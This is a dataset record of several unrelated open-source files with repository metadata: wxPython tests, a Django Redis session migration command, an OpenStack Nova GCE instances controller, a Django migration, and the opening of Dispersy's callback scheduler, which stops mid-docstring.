    'py': 'text/x-python',
    'pyc': 'application/x-python-code',
    'pyo': 'application/x-python-code',
    'qt': 'video/quicktime',
    'ra': 'audio/x-pn-realaudio',
    'ram': 'application/x-pn-realaudio',
    'ras': 'image/x-cmu-raster',
    'rdf': 'application/xml',
    'rgb': 'image/x-rgb',
    'roff': 'application/x-troff',
    'rpm': 'audio/x-pn-realaudio-plugin',
    'rtf': 'application/rtf',
    'rtx': 'text/richtext',
    'sgm': 'text/x-sgml',
    'sgml': 'text/x-sgml',
    'sh': 'application/x-sh',
    'shar': 'application/x-shar',
    'sit': 'application/x-stuffit',
    'skd': 'application/x-koan',
    'skm': 'application/x-koan',
    'skp': 'application/x-koan',
    'skt': 'application/x-koan',
    'snd': 'audio/basic',
    'so': 'application/octet-stream',
    'src': 'application/x-wais-source',
    'sv4cpio': 'application/x-sv4cpio',
    'sv4crc': 'application/x-sv4crc',
    'swf': 'application/x-shockwave-flash',
    't': 'application/x-troff',
    'tar': 'application/x-tar',
    'tcl': 'application/x-tcl',
    'tex': 'application/x-tex',
    'texi': 'application/x-texinfo',
    'texinfo': 'application/x-texinfo',
    'tif': 'image/tiff',
    'tiff': 'image/tiff',
    'tr': 'application/x-troff',
    'tsv': 'text/tab-separated-values',
    'txt': 'text/plain',
    'ustar': 'application/x-ustar',
    'vcd': 'application/x-cdlink',
    'vcf': 'text/x-vcard',
    'vrml': 'x-world/x-vrml',
    'wav': 'audio/x-wav',
    'wiz': 'application/msword',
    'wrl': 'x-world/x-vrml',
    'xbm': 'image/x-xbitmap',
    'xlb': 'application/vnd.ms-excel',
    'xls': 'application/vnd.ms-excel',
    'xml': 'text/xml',
    'xpm': 'image/x-xpixmap',
    'xsl': 'application/xml',
    'xwd': 'image/x-xwindowdump',
    'xyz': 'chemical/x-pdb',
    'zip': 'application/zip'
}
|
UTF-8
|
Python
| false | false | 2,013 |
13,692,355,780,249 |
efc93f63100842ed3d4e6c4f854ac489da3c69c4
|
ba3abe876e84e7968f7966256563afdf65a5a596
|
/src/tests/test_gdi.py
|
88a2d8a97814b5b92ef3a3ca16f8a08f202c4eed
|
[
"MIT"
] |
permissive
|
ifwe/wxpy
|
https://github.com/ifwe/wxpy
|
6beefb6df537f2c860f477a605e0c056ad3a72f2
|
d76fd99bc8a714564657c01ba07650a21d7a215f
|
refs/heads/master
| 2016-09-06T10:48:48.476516 | 2012-07-18T18:52:10 | 2012-07-18T18:52:10 | 5,883,146 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import os.path
import wx
image_folder = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'images')
def test_Image():
    """Exercise wx.Image loading, size accessors, pixel reads and Scale()."""
    imgpath = os.path.join(image_folder, 'digsby_ascii_popup.png')
    assert os.path.exists(imgpath)
    img = wx.Image(imgpath)
    assert img.IsOk()
    # size is known from the checked-in fixture image
    assert img.GetSize() == (362, 324)
    assert img.GetWidth() == img.Width == 362
    assert img.GetHeight() == img.Height == 324
    # top-left pixel of the fixture is white
    assert img.GetRed(0, 0) == img.GetGreen(0, 0) == img.GetBlue(0, 0) == 255
    img2 = img.Scale(50, 50)
    assert img2.IsOk()
    assert img2.GetSize() == (50, 50)
def test_Point():
    """Exercise wx.Point construction, equality, and index get/set access."""
    p = wx.Point()
    assert p.x == p.y == 0
    p2 = wx.Point(10, 20)
    assert p2.x == 10
    assert p2.y == 20
    p3 = wx.Point(5, 6)
    assert p2 != p3
    p4 = wx.Point(5, 6)
    assert p3 == p4
    assert p4 == p4
    # points also support sequence-style indexing
    assert p[0] == p[1] == 0
    assert p2[0] == 10
    p[0] = 42
    assert p[0] == p.x == 42
    p[1] = p3[1]
    assert p == wx.Point(42, 6)
    # comparison against a plain tuple works too
    assert p == (42, 6)
def test_Size():
    """Exercise wx.Size construction and equality."""
    s = wx.Size(1, 2)
    assert s == (1, 2)
    # NOTE(review): the early `return` below disables every assertion that
    # follows — it looks like leftover debugging; confirm whether the
    # remaining checks should be re-enabled.
    return
    # --- unreachable from here on ---
    s = wx.Size()
    assert s.x == s.y == 0
    assert s == s
    s2 = wx.Size(50, 60)
    assert s != s2
    s3 = wx.Size(50, 60)
    assert s2 == s3
    assert s3 == (50, 60)
def test_Rect():
    """Exercise wx.Rect accessors, corners, tuple comparison and Inflate/Offset."""
    r = wx.Rect()
    attrs = 'X Y x y Width Height width height'.split()
    # a default rect is all zeros, via both upper- and lower-case accessors
    assert all(0 == val for val in (getattr(r, a) for a in attrs))
    r2 = wx.Rect(1, 2, 3, 4)
    assert r2.x == r2.GetX() == 1
    assert r2.y == r2.GetY() == 2
    assert r2.width == r2.GetWidth() == r2.Width == 3
    assert r2.height == r2.GetHeight() == r2.Height == 4
    # slicing a rect yields (x, y) == its Position
    assert r2[:2] == r2.Position
    assert r2.TopLeft == r2.GetTopLeft() == wx.Point(1, 2)
    assert r2.TopRight == r2.GetTopRight() == wx.Point(3, 2)
    assert r2.BottomLeft == r2.GetBottomLeft() == wx.Point(1, 5)
    assert r2.BottomRight == r2.GetBottomRight() == wx.Point(3, 5)
    assert r2 == (1, 2, 3, 4)
    assert r2 != (4, 3, 2, 1)
    # RectPS builds from a position and a size, as wx objects or tuples
    r3 = wx.RectPS(wx.Point(20, 30), wx.Size(40, 50))
    r4 = wx.RectPS((20, 30), (40, 50))
    assert r3 == r4
    # NOTE(review): r5 (Inflate result) is never asserted against anything
    r5 = r3.Inflate(10, 10)
    r6 = wx.Rect(40, 40, 20, 20)
    r6.Offset((20, -10))
    assert r6 == (60, 30, 20, 20)
def test_Colour():
    """Exercise wx.Colour channels, equality, unpacking and slicing."""
    c = wx.Colour(33, 66, 99)
    assert c.Red() == 33
    # alpha participates in equality: same RGB but alpha 254 differs
    assert c == wx.Colour(33, 66, 99) != wx.Colour(33, 66, 99, 254)
    assert c != wx.Colour(99, 66, 33)
    # colours are iterable, so they can be star-unpacked
    assert wx.Colour(*c) == c
    assert (lambda *a: sum(a))(*wx.Colour(1,2,3,4)) == 10
    # test color slicing
    assert c[:2] == (33, 66)
    # default alpha is fully opaque (255)
    assert c[:4] == (33, 66, 99, 255)
def test_Pen():
    """Exercise wx.Pen colour, width and style defaults."""
    c = wx.Colour(213, 213, 213)
    p = wx.Pen(c)
    assert p.Colour == c == wx.Colour(213, 213, 213)
    # default pen width is 1, style is solid
    assert p.Width == 1
    p.SetWidth(5)
    assert p.Width == p.GetWidth() == 5
    assert p.Style == p.GetStyle() == wx.SOLID
    assert p.IsOk()
def main():
    """Manual entry point: run the colour tests under a live wx app object."""
    # some wx objects require an app instance to exist before construction
    app = wx.PySimpleApp()
    test_Colour()
    #import memleak
    #memleak.find(test_Rect, loops=50000)
if __name__ == '__main__':
    main()
|
UTF-8
|
Python
| false | false | 2,012 |
11,132,555,276,078 |
71a48be589f5cd1f5c85468b4cfe75eacc5e829c
|
dd6096227f45f1eebc454a682910d5da0fcb5482
|
/redis_sessions/management/commands/migrate_db_sessions.py
|
81351cbaff471898121f8fcf848c85251b327060
|
[
"BSD-3-Clause"
] |
permissive
|
WoLpH/django-redis-sessions
|
https://github.com/WoLpH/django-redis-sessions
|
01e2711cbe7a176d9d06ddbffdde0cc78921292f
|
f3ed46c77db09e1aec6a92d723ce96d0d2950061
|
refs/heads/master
| 2023-09-05T06:51:00.355619 | 2012-02-20T13:54:08 | 2012-02-20T13:54:08 | 3,490,089 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import gc
import math
import time
import datetime
from django.core.management.base import BaseCommand
from django.contrib.sessions.models import Session
from redis_sessions.session import SessionStore
CHUNK_SIZE = 100000
class Command(BaseCommand):
    '''Convert your database sessions to redis sessions
    If this script is too slow, you can use this instead:
    Put this query in `sessions.sql`:
    COPY (
        SELECT
            'SETEX ' || session_key || ' '
            || DATE_PART('epoch', expire_date - NOW())::integer ||
            ' "' || session_data || '"'
        FROM django_session
        where expire_date > NOW()
    )
    TO STDOUT;
    And execute this command:
    # psql -f sessions.sql | redis-cli
    '''
    def handle(self, *args, **kwargs):
        # Entry point: stream every non-expired DB session into redis via
        # one big pipeline.
        server = SessionStore().server
        now = datetime.datetime.now()
        self.sessions = Session.objects.filter(
            expire_date__gte=now,
        ).values_list(
            'session_key',
            'session_data',
            'expire_date',
        )
        self.start_progressbar()
        # transaction=False: plain pipeline without a MULTI/EXEC wrapper
        pipe = server.pipeline(transaction=False)
        for i, session in enumerate(self.sessions.iterator()):
            session_key, session_data, expire_date = session
            if i % CHUNK_SIZE == 0:
                # periodically reclaim memory while iterating a huge queryset
                gc.collect()
            if expire_date < now:
                # this session is old, let's ignore it
                continue
            # convert the expire date to a ttl in seconds
            delta = expire_date - now
            ttl = (delta.days * 24 * 60 * 60) + delta.seconds
            # set the key, value and ttl
            pipe.set(session_key, session_data)
            pipe.expire(session_key, ttl)
            self.update_progressbar(i)
        # execute all commands in 1 big pipeline
        pipe.execute()
        self.end_progressbar()
    def start_progressbar(self):
        # Prepare progress reporting: use the optional third-party
        # `progressbar` module when available, plain prints otherwise.
        self.total = self.sessions.count()
        # digits needed to zero-pad the counter in the plain-text fallback
        self.log = int(math.ceil(math.log(self.total) / math.log(10)))
        self.progressbar = None
        try:
            import progressbar
            self.progressbar = progressbar.ProgressBar(
                widgets=[
                    progressbar.Percentage(),
                    ' :: ',
                    progressbar.Counter(), '/%d' % self.total,
                    ' :: ',
                    progressbar.ETA(),
                    ' :: ',
                    progressbar.Bar(),
                ],
                maxval=self.total,
                poll=0.1,
            )
        except ImportError:
            print 'Using the `progressbar` module is recommended to get a',
            print 'pretty live progressbar.'
            print
            print 'Going to process %d items' % self.total
        # NOTE(review): when the import above failed, self.progressbar is
        # still None here, so this unconditional .start() raises
        # AttributeError — the fallback path looks broken.
        self.progressbar.start()
        self.start = time.time()
    def update_progressbar(self, value):
        # Report progress through the bar when present, else print a counter.
        if self.progressbar:
            self.progressbar.update(value)
        else:
            print '%0*d/%0*d' % (self.log, value, self.log, self.total)
    def end_progressbar(self):
        # Drop the bar and print a throughput summary.
        self.progressbar = None
        delta = time.time() - self.start
        print ('Processed %d sessions in %.3f seconds processing %.3f items '
               'per second on average') % (
            self.total,
            delta,
            self.total / delta,
        )
|
UTF-8
|
Python
| false | false | 2,012 |
4,277,787,463,287 |
b9c8b1c43b415b556c9f5d16a86d9247a9136ffb
|
c98ff0704844f38264462ba24ff481843ce60e96
|
/collective/collage/blogging/browser/utils.py
|
07899c87e19e9e5d9e1d0acddc1257ab13863ff7
|
[
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later"
] |
non_permissive
|
collective/collective.collage.blogging
|
https://github.com/collective/collective.collage.blogging
|
f53070b06d63a15df427eee6a988b7f9881d6748
|
c024f4191d178908568936024d80fea246d630a8
|
refs/heads/master
| 2023-03-22T14:54:20.415550 | 2012-10-13T19:45:53 | 2012-10-13T19:45:53 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from zope.interface import implements
from Products.Five.browser import BrowserView
from Products.CMFCore.utils import getToolByName
from Products.Collage.interfaces import ICollageAlias
from collective.blogging.interfaces import IBlogMarker
from collective.collage.blogging.interfaces import ICollageBloggingUtil
class CollageBloggingUtil(BrowserView):
    """
    a public traversable utility that checks if a blog is enabled
    """
    implements(ICollageBloggingUtil)
    def should_include(self):
        # NOTE(review): `utils` is assigned but never used below.
        utils = getToolByName(self.context, 'plone_utils')
        # Walk the collage structure: rows -> columns -> items.
        for row in self.context.folderlistingFolderContents():
            for column in row.folderlistingFolderContents():
                for item in column.folderlistingFolderContents():
                    if ICollageAlias.providedBy(item):
                        # resolve collage aliases to their target object
                        item=item.get_target()
                    if IBlogMarker.providedBy(item):
                        # return True
                        # NOTE(review): the `return True` above is commented
                        # out, so the method returns False even when a
                        # blog-marked item IS found — confirm this is
                        # intentional and not a leftover debug change.
                        return False
        return False
|
UTF-8
|
Python
| false | false | 2,012 |
7,292,854,493,732 |
7836f73e28c858d448b0dc37a8aa655e5abb7442
|
a13873717b4ef7864ad02b49ae6f4ff4222f548b
|
/nova/api/gce/instances.py
|
5963f5f004d32696c5a828803531298718f9f425
|
[
"Apache-2.0"
] |
permissive
|
cloudscaling/nova-gce
|
https://github.com/cloudscaling/nova-gce
|
612df8cfce0ff89831b7bebe22bbc3c585eee27f
|
0bed935f6d90190a1833bbb0d358935a1e70f9c7
|
HEAD
| 2016-08-08T11:44:38.967408 | 2012-10-15T21:24:24 | 2012-10-15T21:56:46 | 6,196,850 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Copyright 2012 Cloudscaling Group, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import webob
from nova.compute import api as compute_api
from nova.compute import utils as compute_utils
from nova.db.api import security_group_get_by_name_like
from nova.network import api as network_api
from nova.volume import api as volume_api
from nova.compute import instance_types
from nova.api.gce import errors
from nova.api.gce.views import instances as instances_view
from nova.api.gce.views import operations as operations_view
from nova.api.gce import wsgi as gce_wsgi
from nova.api.openstack import wsgi as openstack_wsgi
from nova.openstack.common import log as logging
from nova import exception
from nova import utils
LOG = logging.getLogger(__name__)
class Controller(openstack_wsgi.Controller):
    """GCE-compatible instances controller.

    Maps Google Compute Engine instance API calls (list/get/insert/delete
    plus access-config management) onto the nova compute, network and
    volume APIs, and renders results through the GCE view builders.
    """
    _view_builder_class = instances_view.ViewBuilder
    def __init__(self, **kwargs):
        super(Controller, self).__init__(**kwargs)
        # nova service facades used by every request handler below
        self._compute_api = compute_api.API()
        self._network_api = network_api.API()
        self._volume_api = volume_api.API()
    def index(self, req):
        # GCE "list": all non-deleted instances visible to the context.
        instances = self._get_instances(req)
        return self._view_builder.index(req, instances)
    def show(self, req, id):
        # GCE "get": a single instance by id, 404 when unknown.
        context = req.environ['nova.context']
        try:
            instance = self._compute_api.get(context, id)
            return self._view_builder.basic(req, instance)
        except exception.NotFound:
            raise webob.exc.HTTPNotFound()
    def create(self, req, body):
        # GCE "insert": build a nova boot request from the GCE body.
        context = req.environ['nova.context']
        name = body['name']
        machine_type = body['machineType']
        networks = []
        networks_names = []
        groups_names = []
        project_id = context.project_id
        # collect the network names referenced by the requested interfaces
        # (GCE passes full resource URLs; the last path segment is the name)
        for net_iface in body['networkInterfaces']:
            networks_names.append(net_iface['network'].split('/')[-1])
        for net_name in networks_names:
            try:
                network_settings = self._network_api.get(context, net_name)
                networks.append((network_settings['uuid'], None))
                # pick up the security groups attached to each network
                groups_names.extend([g.name for g
                    in security_group_get_by_name_like(context,
                        project_id, network_settings['uuid'])])
            except exception.NetworkNotFound:
                raise webob.exc.HTTPNotFound(_("Network not found"))
        # de-duplicate group names gathered across networks
        groups_names = list(set(groups_names))
        image = body.get('image')
        description = body['description']
        # NOTE(review): `zone` is read but never used afterwards.
        zone = body['zone']
        if image is None:
            return operations_view.generate_operation(req,
                "", 'insert',
                errors.generate_error(req, u"Image not found"))
        try:
            metadata_list = body['metadata']['items']
        except KeyError:
            metadata_list = []
        instance_metadata = dict([(x['key'], x['value']) for x
            in metadata_list])
        # GCE passes SSH keys through metadata; only the first
        # "keyname:keydata" line is honoured here
        ssh_keys = instance_metadata.pop('sshKeys', None)
        if ssh_keys:
            key_name, key_data = ssh_keys.split('\n')[0].split(":")
        else:
            key_name = key_data = None
        instance_disks = body.get('disks', [])
        disks = []
        for disk in instance_disks:
            device_name = disk["deviceName"]
            volume_id = disk["source"].split("/")[-1]
            try:
                # NOTE(review): this expression only verifies the volume
                # exists; the trailing ", device_name" builds a tuple that
                # is immediately discarded.
                self._volume_api.get(context, volume_id), device_name
                disks.append({"volume_id": volume_id,
                    "device_name": device_name,
                    "volume_size": "",
                    "delete_on_termination": 0})
            except exception.VolumeNotFound, e:
                # missing volumes are logged and skipped, not fatal
                LOG.error("Volume (%s) doesn't exist", volume_id)
        try:
            instance_type = self._machine_type_ref_to_instance(machine_type)
            image_name = self._image_ref_to_image(image)
            (instances, resv_id) = self._compute_api.create(context,
                instance_type,
                image_name,
                display_name=name,
                display_description=description,
                min_count=1,
                max_count=1,
                metadata=instance_metadata,
                security_group=groups_names,
                key_name=key_name,
                key_data=key_data,
                requested_networks=networks,
                block_device_mapping=disks)
        except exception.InstanceTypeNotFoundByName:
            raise webob.exc.HTTPNotFound()
        except exception.NetworkHostNotSet:
            raise webob.exc.HTTPNotFound()
        except exception.ImageNotFound:
            raise webob.exc.HTTPNotFound()
        instance_id = instances[0]["id"]
        target_link = self._view_builder._get_links(req,
            instance_id,
            self._view_builder._collection_name)
        operation_type = "insert"
        return operations_view.generate_operation(req,
            target_link, operation_type)
    def delete(self, req, id):
        # GCE "delete": remove the instance, answer with an operation doc.
        ctxt = self._get_context(req)
        try:
            instance = self._compute_api.get(ctxt, id)
            self._compute_api.delete(ctxt, instance)
        except exception.InstanceNotFound:
            raise webob.exc.HTTPNotFound()
        target_link = self._view_builder._get_links(req,
            instance['id'],
            self._view_builder._collection_name)
        operation_type = 'delete'
        return operations_view.generate_operation(req,
            target_link, operation_type)
    def _get_context(self, req):
        # The nova RequestContext is stashed in the WSGI environ upstream.
        return req.environ['nova.context']
    def _machine_type_ref_to_instance(self, machine_type_ref):
        # GCE machine types use '-' where nova flavors use '.'
        # (e.g. "m1-small" -> "m1.small"); only the last URL segment counts.
        machine_type = machine_type_ref.split('/')[-1].replace("-", ".")
        instance_type = instance_types.get_instance_type_by_name(
            machine_type)
        return instance_type
    def _image_ref_to_image(self, image_ref):
        # strip a GCE resource URL down to the bare image name
        return image_ref.split('/')[-1]
    def _get_instances(self, req):
        # Fetch all non-deleted instances, scoped by project when the
        # context has one, otherwise by user.
        context = req.environ['nova.context']
        search_opts = {}
        search_opts['deleted'] = False
        if context.project_id:
            search_opts['project_id'] = context.project_id
        else:
            search_opts['user_id'] = context.user_id
        instances = self._compute_api.get_all(context,
            search_opts=search_opts)
        return instances
    def add_access_config(self, req, body, id):
        # GCE "addAccessConfig": associate a floating IP (natIP) with the
        # instance's first fixed IP.  All failures are reported as GCE
        # error operations rather than HTTP errors.
        context = req.environ['nova.context']
        # NOTE(review): network_interface, type_access_config and name are
        # read from the request but never used below.
        network_interface = req.GET.get('network_interface')
        type_access_config = body.get('type')
        name = body.get('name')
        address = body.get('natIP')
        if address is None:
            return operations_view.generate_operation(req, "", "insert",
                errors.generate_error(req, u"NAT IP not found"))
        instance = self._compute_api.get(context, id)
        cached_nwinfo = compute_utils.get_nw_info_for_instance(instance)
        if not cached_nwinfo:
            return operations_view.generate_operation(req, "", "insert",
                errors.generate_error(req,
                    u"No nw_info cache associated with instance"))
        fixed_ips = cached_nwinfo.fixed_ips()
        if not fixed_ips:
            return operations_view.generate_operation(req, "", "insert",
                errors.generate_error(req,
                    u"No fixed ips associated to instance"))
        if len(fixed_ips) > 1:
            msg = _('multiple fixed_ips exist, using the first: %s')
            LOG.warning(msg, fixed_ips[0]['address'])
        try:
            self._network_api.associate_floating_ip(context, instance,
                floating_address=address,
                fixed_address=fixed_ips[0]['address'])
        except exception.FloatingIpAssociated:
            return operations_view.generate_operation(req, "", "insert",
                errors.generate_error(req,
                    u"floating ip is already associated"))
        except exception.NoFloatingIpInterface:
            return operations_view.generate_operation(req, "", "insert",
                errors.generate_error(req,
                    u"l3driver call to add floating ip failed"))
        except Exception:
            # catch-all: report any other association failure to the client
            return operations_view.generate_operation(req, "", "insert",
                errors.generate_error(req,
                    u"Error. Unable to associate floating ip"))
        target_link = self._view_builder._get_links(req,
            instance['id'],
            self._view_builder._collection_name)
        operation_type = 'insert'
        return operations_view.generate_operation(req,
            target_link, operation_type)
    def delete_access_config(self, req, id):
        # GCE "deleteAccessConfig": disassociate a floating IP from the
        # instance, identified by the access_config query parameter.
        context = req.environ['nova.context']
        # NOTE(review): network_interface is read but never used.
        network_interface = req.GET.get('network_interface')
        address = req.GET.get('access_config')
        # get the floating ip object
        floating_ip = self._network_api.get_floating_ip_by_address(context,
            address)
        # get the associated instance object (if any)
        instance = get_instance_by_floating_ip_addr(self, context, address)
        # disassociate if associated
        if (instance and
                floating_ip.get('fixed_ip_id')):
            disassociate_floating_ip(self, context, instance, address)
            target_link = self._view_builder._get_links(req,
                instance['id'],
                self._view_builder._collection_name)
            operation_type = 'delete'
            return operations_view.generate_operation(req,
                target_link, operation_type)
        else:
            return operations_view.generate_operation(req, "", "delete",
                errors.generate_error(req, u"Not found"))
def get_instance_by_floating_ip_addr(self, context, address):
    # Helper taking the controller as explicit first argument (called as a
    # plain function with `self` passed in, mirroring nova's floating-ip
    # extension code).  Returns the instance associated with the floating
    # address, or None when the address is not associated.
    snagiibfa = self._network_api.get_instance_id_by_floating_address
    instance_id = snagiibfa(context, address)
    if instance_id:
        return self._compute_api.get(context, instance_id)
def disassociate_floating_ip(self, context, instance, address):
    # Helper taking the controller as explicit first argument (see
    # get_instance_by_floating_ip_addr).  Translates nova exceptions into
    # the appropriate HTTP errors.
    try:
        self._network_api.disassociate_floating_ip(context, instance, address)
    except exception.NotAuthorized:
        raise webob.exc.HTTPUnauthorized()
    except exception.FloatingIpNotAssociated:
        msg = _('Floating ip is not associated')
        raise webob.exc.HTTPBadRequest(explanation=msg)
def create_resource():
    # Factory wiring the controller into the GCE WSGI resource wrapper.
    return gce_wsgi.GCEResource(Controller())
|
UTF-8
|
Python
| false | false | 2,012 |
10,402,410,811,552 |
10ec7664a1c1c328a0886300e8e37ad6572643b6
|
a807c430c41231dc02b0e6e15e19dbf92261c3e4
|
/mysite/lab/migrations/0005_auto_20141017_1911.py
|
0268ec188791a40a5ab6c17f13df0a3132932561
|
[] |
no_license
|
VDenis/Subject-NetworkProgramming-lab
|
https://github.com/VDenis/Subject-NetworkProgramming-lab
|
200fc0fc5c9a39757aa3c4f560b83acf26abe337
|
5056b823cd3ad2eafb255984e2a37d1762b7c260
|
refs/heads/master
| 2016-09-06T09:14:01.607937 | 2014-10-25T08:04:17 | 2014-10-25T08:04:17 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Auto-generated Django schema migration (2014-10-17 19:11).

    Links lab-work pages to students and subjects, attaches subjects to a
    professor, and shortens the subject name field.
    """
    dependencies = [
        ('lab', '0004_auto_20141017_0226'),
    ]
    operations = [
        # new FK: each laboratory-work page belongs to one student
        # (default=0 backfills existing rows, then the default is dropped)
        migrations.AddField(
            model_name='pagelaboratorywork',
            name='student',
            field=models.ForeignKey(default=0, to='lab.Student'),
            preserve_default=False,
        ),
        # new M2M: a laboratory-work page can cover several subjects
        migrations.AddField(
            model_name='pagelaboratorywork',
            name='subject',
            field=models.ManyToManyField(to='lab.Subject'),
            preserve_default=True,
        ),
        # new FK: every subject is taught by one professor
        migrations.AddField(
            model_name='subject',
            name='professor',
            field=models.ForeignKey(default=0, to='lab.Professor'),
            preserve_default=False,
        ),
        # shrink subject.name to max_length=75
        migrations.AlterField(
            model_name='subject',
            name='name',
            field=models.CharField(max_length=75),
        ),
    ]
|
UTF-8
|
Python
| false | false | 2,014 |
6,416,681,160,797 |
2aa5e9071d92dc5ea5a79962027347203e5d9220
|
b61c708d29dab090c2ca87ab0ff56b2bbfb4704f
|
/callback.py
|
bf7b68e504c36be7d62e6f420a8c4e878eb32409
|
[] |
no_license
|
vladum/dispersy
|
https://github.com/vladum/dispersy
|
1564b8ae31b23253bea1f2f73bc16b197b5b7e4b
|
b8eab4fb501213ae151372cd83a6131582e2ad6b
|
refs/heads/master
| 2020-12-24T11:33:23.911402 | 2013-03-13T17:20:10 | 2013-03-13T17:20:10 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Python 2.5 features
from __future__ import with_statement
"""
A callback thread running Dispersy.
"""
from heapq import heappush, heappop
from thread import get_ident
from threading import Thread, Lock, Event, currentThread
from time import sleep, time
from types import GeneratorType, TupleType
from sys import exc_info
try:
import prctl
except ImportError:
prctl = None
from .decorator import attach_profiler
from .dprint import dprint
from .revision import update_revision_information
if __debug__:
from atexit import register as atexit_register
from inspect import getsourcefile, getsourcelines
from types import LambdaType
# dprint warning when registered call, or generator call, takes more than N seconds
CALL_DELAY_FOR_WARNING = 0.5
# dprint warning when registered call, or generator call, should have run N seconds ago
QUEUE_DELAY_FOR_WARNING = 1.0
# update version information directly from SVN
update_revision_information("$HeadURL$", "$Revision$")
class Callback(object):
    if __debug__:
        @staticmethod
        def _debug_call_to_string(call):
            """Return a short human-readable name for a registered call.

            Compiled in only when running with __debug__; used purely for
            debug output.
            """
            # 10/02/12 Boudewijn: in python 2.5 generators do not have .__name__
            if isinstance(call, TupleType):
                if isinstance(call[0], LambdaType):
                    # identify lambdas by (truncated) source file and line number
                    return "lambda@%s:%d" % (getsourcefile(call[0])[-25:], getsourcelines(call[0])[1])
                else:
                    return call[0].__name__
            elif isinstance(call, GeneratorType):
                return call.__name__
            else:
                return str(call)
    def __init__(self):
        """Initialise the scheduler state; the thread is not started yet."""
        # _event is used to wakeup the thread when new actions arrive
        self._event = Event()
        self._event_set = self._event.set
        self._event_is_set = self._event.isSet
        # _lock is used to protect variables that are written to on multiple threads
        self._lock = Lock()
        # _thread_ident is used to detect when methods are called from the same thread
        self._thread_ident = 0
        # _state contains the current state of the thread.  it is protected by _lock and follows the
        # following states:
        #
        #                                              --> fatal-exception -> STATE_EXCEPTION
        #                                             /
        # STATE_INIT -> start() -> PLEASE_RUN -> STATE_RUNNING
        #                \                              \
        #                 --------------> stop() -> PLEASE_STOP -> STATE_FINISHED
        #
        self._state = "STATE_INIT"
        if __debug__: dprint("STATE_INIT")
        # _exception is set to SystemExit, KeyboardInterrupt, GeneratorExit, or AssertionError when
        # any of the registered callbacks raises any of these exceptions.  in this case _state will
        # be set to STATE_EXCEPTION.  it is protected by _lock
        self._exception = None
        self._exception_traceback = None
        # _exception_handlers contains a list with callable functions of methods.  all handlers are
        # called whenever an exception occurs.  first parameter is the exception, second parameter
        # is a boolean indicating if the exception is fatal (i.e. True indicates SystemExit,
        # KeyboardInterrupt, GeneratorExit, or AssertionError)
        self._exception_handlers = []
        # _id contains a running counter to ensure that every scheduled callback has its own unique
        # identifier.  it is protected by _lock
        self._id = 0
        # _requests are ordered by deadline and moved to -expired- when they need to be handled
        # (deadline, priority, root_id, (call, args, kargs), callback)
        self._requests = []
        # expired requests are ordered and handled by priority
        # (priority, root_id, None, (call, args, kargs), callback)
        self._expired = []
        # _requests_mirror and _expired_mirror contains the same list as _requests and _expired,
        # respectively.  when the callback closes _requests is set to a new empty list while
        # _requests_mirror continues to point to the existing one.  because all task 'deletes' are
        # done on the _requests_mirror list, these actions will still be allowed while no new tasks
        # will be accepted.
        self._requests_mirror = self._requests
        self._expired_mirror = self._expired
        if __debug__:
            # debug builds assert at interpreter exit that the thread was
            # properly stopped before shutdown
            def must_close(callback):
                assert callback.is_finished
            atexit_register(must_close, self)
            self._debug_thread_name = ""
            self._debug_call_name = None
@property
def ident(self):
return self._thread_ident
@property
def is_current_thread(self):
    """
    Returns True when called on this Callback thread.

    Compares the caller's thread id against the id captured in _loop().
    """
    return self._thread_ident == get_ident()
@property
def is_running(self):
    """
    Returns True when the state is STATE_RUNNING.
    """
    return self._state == "STATE_RUNNING"
@property
def is_finished(self):
    """
    Returns True when the state is STATE_FINISHED, STATE_EXCEPTION, or STATE_INIT.
    In each of these states the thread is not running.
    """
    return self._state == "STATE_FINISHED" or self._state == "STATE_EXCEPTION" or self._state == "STATE_INIT"
@property
def exception(self):
    """
    Returns the exception that caused the thread to exit when any of the registered
    callbacks raised either SystemExit, KeyboardInterrupt, GeneratorExit, or
    AssertionError (None otherwise).
    """
    return self._exception
@property
def exception_traceback(self):
    """
    Returns the traceback of the exception that caused the thread to exit
    (see the `exception` property), or None when no such exception occurred.
    """
    return self._exception_traceback
def attach_exception_handler(self, func):
    """
    Attach a new exception notifier.

    FUNC will be called whenever a registered call raises an exception.  The first
    parameter will be the raised exception, the second parameter will be a boolean
    indicating if the exception was fatal.

    Fatal exceptions are SystemExit, KeyboardInterrupt, GeneratorExit, or AssertionError.
    These exceptions will cause the Callback thread to exit.  The Callback thread will
    continue to function on all other exceptions.
    """
    assert callable(func), "handler must be callable"
    with self._lock:
        # attaching the same handler twice would make it fire twice per exception
        assert not func in self._exception_handlers, "handler was already attached"
        self._exception_handlers.append(func)
def detach_exception_handler(self, func):
    """
    Detach an existing exception notifier (previously given to attach_exception_handler).
    """
    assert callable(func), "handler must be callable"
    with self._lock:
        assert func in self._exception_handlers, "handler is not attached"
        self._exception_handlers.remove(func)
def _call_exception_handlers(self, exception, fatal):
    """Invoke every attached exception handler with (exception, fatal)."""
    # copy the handler list under the lock so handlers may attach/detach
    # during iteration without corrupting it
    with self._lock:
        exception_handlers = self._exception_handlers[:]
    for exception_handler in exception_handlers:
        try:
            exception_handler(exception, fatal)
        except Exception:
            # a handler must never raise; log and fail loudly in debug builds
            dprint(exception=True, level="error")
            assert False, "the exception handler should not cause an exception"
def register(self, call, args=(), kargs=None, delay=0.0, priority=0, id_="", callback=None, callback_args=(), callback_kargs=None, include_id=False):
    """
    Register CALL to be called.

    The call will be made with ARGS and KARGS as arguments and keyword arguments,
    respectively.  ARGS must be a tuple and KARGS must be a dictionary.

    CALL may return a generator object that will be repeatedly called until it raises
    the StopIteration exception.  The generator can yield floating point values to
    reschedule the generator after that amount of seconds counted from the scheduled
